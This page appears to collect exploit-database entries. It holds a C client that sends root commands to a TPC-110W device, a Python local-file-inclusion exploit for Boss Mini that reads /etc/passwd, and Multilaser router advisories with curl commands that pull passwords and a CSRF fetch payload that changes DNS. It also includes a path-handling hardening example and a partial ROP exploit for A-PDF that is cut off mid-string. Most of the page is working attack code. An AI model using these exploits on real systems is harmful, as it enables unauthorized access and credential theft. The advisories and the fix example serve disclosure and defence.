<pre><code>#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include <sys/socket.h><br />#include <arpa/inet.h><br />#include <unistd.h><br /><br />int main(int argc, char *argv[]) {<br />    int sock;<br />    struct sockaddr_in serv_addr;<br />    char command[512];<br />    ssize_t n;<br /><br />    sock = socket(AF_INET, SOCK_STREAM, 0);<br />    if (sock < 0) {<br />        perror("socket");<br />        exit(1);<br />    }<br /><br />    memset(&serv_addr, 0, sizeof(serv_addr)); // zero the whole struct (0, not the character '0')<br />    serv_addr.sin_family = AF_INET;<br />    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888<br />    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10<br />        perror("inet_pton");<br />        exit(1);<br />    }<br /><br />    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {<br />        perror("connect");<br />        exit(1);<br />    }<br /><br />    // Run command with root privileges: the service executes the received line as-is<br />    snprintf(command, sizeof(command), "id\n"); // Check user id<br />    if (write(sock, command, strlen(command)) < 0) {<br />        perror("write");<br />        close(sock);<br />        exit(1);<br />    }<br /><br />    // Read the reply, leaving one byte for the terminator so printf never runs past the buffer<br />    memset(command, 0, sizeof(command));<br />    n = read(sock, command, sizeof(command) - 1);<br />    if (n < 0) {<br />        perror("read");<br />        close(sock);<br />        exit(1);<br />    }<br />    command[n] = '\0';<br />    printf("%s\n", command);<br /><br />    close(sock);<br />    return 0;<br />}<br /><br />//gcc -o tpc-110w-exploit tpc-110w-exp<br /></code></pre>
<pre><code># Exploit Title: Boss Mini 1.4.0 - local file inclusion<br /># Date: 07/12/2023<br /># Exploit Author: nltt0 (https://github.com/nltt-br)<br /># CVE: CVE-2023-3643<br /><br /><br />'''<br /> _____ _ _____ <br />/ __ \ | | / ___|<br />| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. <br />| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \<br />| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /<br /> \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ <br /> __/ | <br /> |___/ <br /><br />'''<br /><br />from argparse import ArgumentParser<br />from urllib.parse import quote, urlsplit<br /><br />import urllib3<br />from requests import post<br /><br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  # verify=False below<br /><br />parser = ArgumentParser(description='Local file inclusion [Boss Mini]')<br />parser.add_argument('--domain', required=True, help='Application host or base URL, e.g. https://boss.example.com')<br />parser.add_argument('--file', required=True, help='Local file to read, e.g. /etc/passwd')<br />args = parser.parse_args()<br /><br /># Accept either a bare host name or a full URL; the Host and Referer headers need the bare host.<br />base = args.domain if '://' in args.domain else 'https://' + args.domain<br />base = base.rstrip('/')<br />host = urlsplit(base).netloc<br />url = '{}/boss/servlet/document'.format(base)<br /># The path is percent-encoded here and once more by requests' form encoding, as in the original exploit.<br />file2 = quote(args.file, safe='')<br /><br />headers = {<br />    'Host': host,<br />    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',<br />    'Content-Type': 'application/x-www-form-urlencoded',<br />    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',<br />    'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)<br />}<br /><br />data = {<br />    'path': file2<br />}<br /><br />try:<br />    req = post(url, headers=headers, data=data, verify=False, timeout=15)<br />    if req.status_code == 200:<br />        print(req.text)<br />    else:<br />        print('Unexpected HTTP status {}'.format(req.status_code))<br />except Exception as e:<br />    print('Error in {}'.format(e))<br /></code></pre>
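The request above posts a client-chosen `path` value to `/boss/servlet/document` and receives the file back. As an added example that is not Boss Mini's code (the page does not show the servlet's internals), the Python below models the defect in `serve_document_vulnerable` and the corrected handling in `resolve_document_path`: decode the parameter exactly once, refuse input that is still encoded, NUL bytes, absolute paths and backslashes, resolve symlinks, and require the result to stay under the document root. The document root, file names and sample inputs are constructed for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote


class Forbidden(Exception):
    """Requested path is outside the document root."""


def serve_document_vulnerable(doc_root, path_param):
    """Vulnerable pattern: the client's 'path' is decoded and opened as-is.
    os.path.join discards doc_root when the input is absolute (/etc/passwd),
    and '../' sequences walk out of it."""
    candidate = os.path.join(doc_root, unquote(path_param))
    with open(candidate, "rb") as fh:
        return fh.read()


def resolve_document_path(doc_root, path_param):
    """Hardened resolution: decode once, reject anything still encoded, NUL
    bytes, absolute paths and backslashes, then resolve symlinks and require
    the result to stay inside the (resolved) document root."""
    decoded = unquote(path_param)
    if "%" in decoded or "\x00" in decoded:
        raise Forbidden("double-encoded or NUL byte in path")
    if os.path.isabs(decoded) or decoded.startswith(("/", "\\")) or "\\" in decoded:
        raise Forbidden("absolute path or backslash separator")
    root = os.path.realpath(doc_root)
    target = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, target]) != root:
        raise Forbidden("path escapes document root")
    return target


def serve_document_hardened(doc_root, path_param):
    with open(resolve_document_path(doc_root, path_param), "rb") as fh:
        return fh.read()


def classify(doc_root, inputs):
    """Map each candidate 'path' value to True (accepted) or False (refused)
    under the hardened resolver, without touching the file system."""
    verdicts = {}
    for value in inputs:
        try:
            resolve_document_path(doc_root, value)
            verdicts[value] = True
        except Forbidden:
            verdicts[value] = False
    return verdicts


def demo():
    """Constructed document root beside a secret file. Returns
    (vulnerable_leaked, hardened_refused, hardened_served_legit)."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "secret.txt"), "w") as fh:
            fh.write("top-secret\n")
        root = os.path.join(tmp, "docroot")
        os.mkdir(root)
        with open(os.path.join(root, "report.txt"), "w") as fh:
            fh.write("quarterly report\n")
        # Vulnerable handler: an encoded "../secret.txt" walks out of the root.
        leaked = serve_document_vulnerable(root, "..%2Fsecret.txt") == b"top-secret\n"
        # Hardened handler: the same input is refused ...
        try:
            serve_document_hardened(root, "..%2Fsecret.txt")
            refused = False
        except Forbidden:
            refused = True
        # ... while a document inside the root is still served.
        served = serve_document_hardened(root, "report.txt") == b"quarterly report\n"
        return leaked, refused, served


if __name__ == "__main__":
    print(demo())
    print(classify("/opt/boss/docs", ["/etc/passwd", "..%2F..%2Fetc%2Fpasswd", "reports/q1.txt"]))
```

`realpath` is applied to both the root and the candidate so that a symlinked root (or a symlink planted inside it) cannot defeat the prefix comparison, and the check on `%` after a single `unquote` is what stops the double-encoding trick that a decode-twice server would otherwise fall for.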
<pre><code>=====[Tempest Security Intelligence - Security Advisory - CVE-2023-38946]=======<br /><br /> Access Control Bypass in Multilaser router's Web Management Interface<br /><br /> Author: Vinicius Moraes < vinicius.moraes.w () gmail com ><br /><br />=====[Table of Contents]========================================================<br /><br />1. Overview<br />2. Detailed description<br />3. Other contexts & solutions<br />4. Acknowledgements<br />5. Timeline<br />6. References<br /><br />=====[1. Overview]==============================================================<br /><br />* Systems affected: Multilaser RE160 web interface - V5.07.51_pt_MTL01 (verified)<br />                                                   - V5.07.52_pt_MTL01 (verified)<br />                    (other routers/versions may be affected)<br />* Release date: 28/02/2024<br />* CVSS score: 7.7 / High<br />* CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br />* Impact: This vulnerability allows attackers to bypass the access control of the router's web interface and perform management actions, such as changing the DNS settings, enabling router remote access, changing the IP routing table, and retrieving the WiFi and management application passwords. Notably, the attack can be conducted remotely.<br /><br />=====[2. Detailed description]==================================================<br /><br />The affected Multilaser router has a web management interface designed to graphically assist users in configuring features and diagnosing problems. However, there is a bug in its access control mechanism that allows unauthenticated users to access the router's management features.<br /><br />In order to exploit this bug, it is necessary to add an "admin:" cookie to the requests. The following example shows how an unauthenticated user (not bearing a credential or session token) could do so with the curl tool[1] to retrieve, for example, a backup of the router config, which contains its web interface password:<br /><br />[snippet]<br /><br />$ # traditional unauthenticated request being redirected to the login page<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E 'HTTP/|Locatio'<br />HTTP/1.0 302 Redirect<br />Location: http://[routerIpAddress]/login.asp<br />$<br />$ # malicious unauthenticated request getting the web interface password<br />$ # (in this example: "pass123")<br />$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E 'HTTP/|http_passwd'<br />HTTP/1.0 200 OK<br />http_passwd=pass123<br /><br />[/snippet]<br /><br />By performing the aforementioned steps, an attacker gains access to all features of the web interface, either by exploiting the issue in other endpoints or by using the interface password, contained in the router config, as a traditional user.<br /><br />This vulnerability can be exploited remotely via a malicious mobile/desktop application performing HTTP requests against the router, or locally by connecting to a vulnerable router (such as through the wireless infrastructure of a coffee shop or airport).<br /><br />=====[3. Other contexts & solutions]============================================<br /><br />Conceptually, in order to fix this issue, the server receiving the request must always validate the value of the cookie as a prerequisite for enforcing access control, and that value must not be predictable. Upon not receiving a valid session token within the request, users should be redirected to the login page.<br /><br />Practically, updating to the latest firmware (V5.07.52_pt_MTL01) reduces the attack window for this vulnerability, limiting exploitation to the periods when there is an active user session on the router. However, this equipment is also affected by another vulnerability with the same impact and no attack window limitation[3].<br /><br />Furthermore, Multilaser informed that they contacted the firmware vendor of the model RE160, but due to the age of the equipment and its limitations, it will not receive an update. Therefore, it is recommended to replace the RE160 router with a new one that is receiving updates (such as RE160V or RE163V)[4][5].<br /><br />=====[4. Acknowledgements]======================================================<br /><br /> Joaquim Brasil de Oliveira < palulabrasil () gmail com ><br />                             < twitter.com/palulabr ><br /> Tempest Security Intelligence[2]<br /><br />=====[5. Timeline]==============================================================<br /><br />28/04/2023 - The bug regarding model RE160 was reported to the vendor;<br />29/06/2023 - A new contact was made with the company;<br />29/06/2023 - Vendor sent the latest available firmware for RE160;<br />07/07/2023 - It was confirmed that the latest firmware was still vulnerable;<br />26/10/2023 - Vendor informed that RE160 will not receive a full fix.<br /><br />=====[6. References]============================================================<br /><br /> [1] https://curl.se<br /> [2] https://tempest.com.br<br /> [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945<br /> [4] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v<br /> [5] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v<br /><br /></code></pre>
<pre><code>=====[Tempest Security Intelligence - Security Advisory - CVE-2023-38945]=======<br /><br /> Access Control Bypass in Multilaser routers' Web Management Interface<br /><br /> Author: Vinicius Moraes < vinicius.moraes.w () gmail com ><br /><br />=====[Table of Contents]========================================================<br /><br />1. Overview<br />2. Detailed description<br />3. Other contexts & solutions<br />4. Acknowledgements<br />5. Timeline<br />6. References<br /><br />=====[1. Overview]==============================================================<br /><br />* Systems affected: Multilaser RE160 web interface - V5.07.51_pt_MTL01 (verified)<br />                                                   - V5.07.52_pt_MTL01 (verified)<br />                                                   (other routers/versions may be affected)<br />                    Multilaser RE160V web interface - V12.03.01.08_pt (verified)<br />                                                    - V12.03.01.09_pt (verified)<br />                                                    (other routers/versions may be affected)<br />                    Multilaser RE163V web interface - V12.03.01.08_pt (verified)<br />                                                    (other routers/versions may be affected)<br />* Release date: 28/02/2024<br />* CVSS score: 7.7 / High<br />* CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br />* Impact: This vulnerability allows attackers to bypass the access control of the routers' web interface and perform management actions, such as changing the DNS settings, enabling router remote access, changing the IP routing table, and retrieving the WiFi and management application passwords. Notably, the attack can be conducted remotely.<br /><br />=====[2. Detailed description]==================================================<br /><br />The affected Multilaser routers have a web management interface designed to graphically assist users in configuring features and diagnosing problems. However, there is a bug in its access control mechanism that allows unauthenticated users to access the routers' management features.<br /><br />In order to exploit this bug, it is necessary to append a specific extension to the end of the URL. Some accepted extension values are: js, css, png, jpg, gif, jsp. The following example shows how an unauthenticated user (not bearing a credential or session token) could do so with the curl tool[1] to retrieve, for example, a backup of the RE160 router config, which contains its web interface password:<br /><br />[snippet]<br /><br />$ # traditional unauthenticated request being redirected to the login page<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E 'HTTP/|Locatio'<br />HTTP/1.0 302 Redirect<br />Location: http://[routerIpAddress]/login.asp<br />$<br />$ # malicious unauthenticated request getting the web interface password<br />$ # (in this example: "pass123")<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E 'HTTP/|http_pass'<br />HTTP/1.0 200 OK<br />http_passwd=pass123<br /><br />[/snippet]<br /><br />Furthermore, the next example presents part of a JavaScript snippet that could be added to a malicious website with the purpose of changing the router's DNS address and enabling remote access on vulnerable RE160V and RE163V routers. This is achieved by combining this access control issue with a CSRF[3]:<br /><br />[code]<br /><br />fetch('http://[routerIpAddress]/goform/setSysTools/.js', {<br />    'method': 'POST',<br />    'mode': 'no-cors',<br />    'headers': {<br />        'Content-Type': 'application/x-www-form-urlencoded'<br />    },<br />    'body': 'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'<br />})<br /><br />[/code]<br /><br />By performing the aforementioned steps, an attacker can gain access to all features of the web interface.<br /><br />This vulnerability can be exploited remotely via a malicious website or a mobile/desktop application performing HTTP requests against the router, and also locally, by connecting to a vulnerable router (such as through the wireless infrastructure of a coffee shop or airport).<br /><br />=====[3. Other contexts & solutions]============================================<br /><br />Conceptually, in order to fix this issue, the server receiving the request must always validate the session token in authenticated features as a prerequisite for enforcing access control, regardless of any extension in the URL. Upon not receiving a valid session token within the request, users should be redirected to the login page.<br /><br />Practically, to mitigate this issue, the RE160V should be updated to firmware V12.03.01.12 or newer[4] and the RE163V to firmware V12.03.01.10 or newer[5]. Multilaser informed that they contacted the firmware vendor of the model RE160, but due to the age of the equipment and its limitations, it will not receive an update to fix the issue. Therefore, it is recommended to replace the RE160 router with a new one that has received the fix (such as RE160V or RE163V).<br /><br />=====[4. Acknowledgements]======================================================<br /><br /> Joaquim Brasil de Oliveira < palulabrasil () gmail com ><br />                             < twitter.com/palulabr ><br /> Tempest Security Intelligence[2]<br /><br />=====[5. Timeline]==============================================================<br /><br />13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10) fixed the bug;<br />28/04/2023 - The bug regarding model RE160V was reported to the vendor;<br />29/06/2023 - A new contact was made with the company;<br />29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;<br />07/07/2023 - The same bug in model RE160 was reported to the vendor;<br />16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) where the bug was fixed;<br />26/10/2023 - Vendor informed that RE160 will not receive a fix;<br />26/10/2023 - Vendor released the RE160V update on its website[4].<br /><br />=====[6. References]============================================================<br /><br /> [1] https://curl.se<br /> [2] https://tempest.com.br<br /> [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152<br /> [4] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v<br /> [5] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v<br /><br /></code></pre>
<pre><code>=====[Tempest Security Intelligence - Security Advisory - CVE-2023-38944]=======<br /><br /> Access Control Bypass in Multilaser routers' Web Management Interface<br /><br /> Author: Vinicius Moraes < vinicius.moraes.w () gmail com ><br /><br />=====[Table of Contents]========================================================<br /><br />1. Overview<br />2. Detailed description<br />3. Other contexts & solutions<br />4. Acknowledgements<br />5. Timeline<br />6. References<br /><br />=====[1. Overview]==============================================================<br /><br />* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt (verified)<br />                                                    (other routers/versions may be affected)<br />                    Multilaser RE163V web interface - V12.03.01.10_pt (verified)<br />                                                    (other routers/versions may be affected)<br />* Release date: 28/02/2024<br />* CVSS score: 7.7 / High<br />* CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br />* Impact: This vulnerability allows attackers to bypass the access control of the routers' web interface and perform management actions, such as changing the DNS settings, enabling router remote access, changing the IP routing table, and retrieving the WiFi and management application passwords. Notably, the attack can be conducted remotely.<br /><br />=====[2. Detailed description]==================================================<br /><br />The affected Multilaser routers have a web management interface designed to graphically assist users in configuring features and diagnosing problems. However, there is a bug in its access control mechanism that allows unauthenticated users to access the routers' management features.<br /><br />In order to exploit this bug, it is necessary to remove the Host header from the HTTP requests. The following example shows how an unauthenticated user (not bearing a credential or session token) could do so with the curl tool[1] to retrieve, for example, a backup of the router config:<br /><br />[snippet]<br /><br />$ # traditional unauthenticated request being redirected to the login page<br />$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8<br />HTTP/1.0 302 Redirect<br />Server: GoAhead-Webs<br />Date: Sun Jun 28 11:59:42 2009<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Content-Type: text/html<br />Location: http://[routerIpAddress]/login.html<br /><br />$ # malicious unauthenticated request getting the router config<br />$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg<br />$ head -8 RouterCfm.cfg<br />HTTP/1.0 200 OK<br />Date: Sun Jun 28 12:00:00 2009<br />Server: GoAhead-Webs<br />Last-modified: Sun Jun 28 12:00:00 2009<br />Content-length: 16108<br />Content-type: config/conf<br />Connection: close<br /><br />[/snippet]<br /><br />By performing the aforementioned steps, an attacker gains access to all features of the web interface, either by exploiting the issue in other endpoints or by using the interface password, contained in the router config, as a traditional user:<br /><br />[snippet]<br /><br />$ # getting the web interface password (in this example: "myPass333")<br />$ # stored in base64 in the config file<br />$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'<br />bXlQYXNzMzMz<br />$ # decoding the web interface password<br />$ echo "bXlQYXNzMzMz" | base64 -d<br />myPass333<br /><br />[/snippet]<br /><br />This vulnerability can be exploited remotely via a malicious mobile/desktop application performing HTTP requests against the router, or locally by connecting to a vulnerable router (such as through the wireless infrastructure of a coffee shop or airport).<br /><br />=====[3. Other contexts & solutions]============================================<br /><br />Conceptually, in order to fix this issue, the server receiving the request must always validate the session token as a prerequisite for enforcing access control, regardless of any header. Upon not receiving a valid session token within the request, users should be redirected to the login page.<br /><br />Practically, to mitigate this issue, the routers should be updated to firmware V12.03.01.12 or newer[3][4].<br /><br />=====[4. Acknowledgements]======================================================<br /><br /> Joaquim Brasil de Oliveira < palulabrasil () gmail com ><br />                             < twitter.com/palulabr ><br /> Tempest Security Intelligence[2]<br /><br />=====[5. Timeline]==============================================================<br /><br />28/04/2023 - The bug regarding model RE163V was reported to the vendor;<br />29/06/2023 - A new contact was made with the company;<br />29/06/2023 - Vendor informed they were analysing the bug;<br />19/07/2023 - Vendor shared a new firmware update for RE163V;<br />25/07/2023 - The same bug in model RE160V was reported to the vendor;<br />04/08/2023 - Vendor shared a new firmware update for RE163V;<br />30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;<br />16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;<br />26/10/2023 - Vendor released the updates on its website[3][4].<br /><br />=====[6. References]============================================================<br /><br /> [1] https://curl.se<br /> [2] https://tempest.com.br<br /> [3] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v<br /> [4] https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v<br /><br /></code></pre>
<pre><code>#!/usr/bin/python<br /># Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain<br /># Date: 16 November 2023<br /># Exploit Author: George Washington<br /># Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm<br /># Software Link: http://www.a-pdf.com/all-to-mp3/download.htm<br /># Version: 2.0.0<br /># Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64<br /># Based on: https://www.exploit-db.com/exploits/17275<br /># Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe<br /># Video: https://youtu.be/_JEgdKjbtpI<br /><br />import socket, struct<br /><br />file = "1.wav"<br />size = 8000<br /><br />############ Parameters for HeapCreate() ############<br />EXE = b"ZZZZ" # HeapCreate()<br />EXE += b"AAAA" # RET<br />EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000<br />EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000<br />EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000<br />EXE += b"YYYY" # HeapAlloc()<br />EXE += b"BBBB" # RET<br />EXE += b"CCCC" # Parameter 1 hHandle<br />EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008<br />EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500<br />EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s()<br />EXE += b"DDDD" # heap pointer<br />EXE += b"EEEE" # heap pointer<br />EXE += struct.pack("<I", 0x00000500) # size<br />EXE += b"GGGG" # shellcode pointer<br />EXE += struct.pack("<I", 0x00000500) # size<br /><br />junk = 
b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9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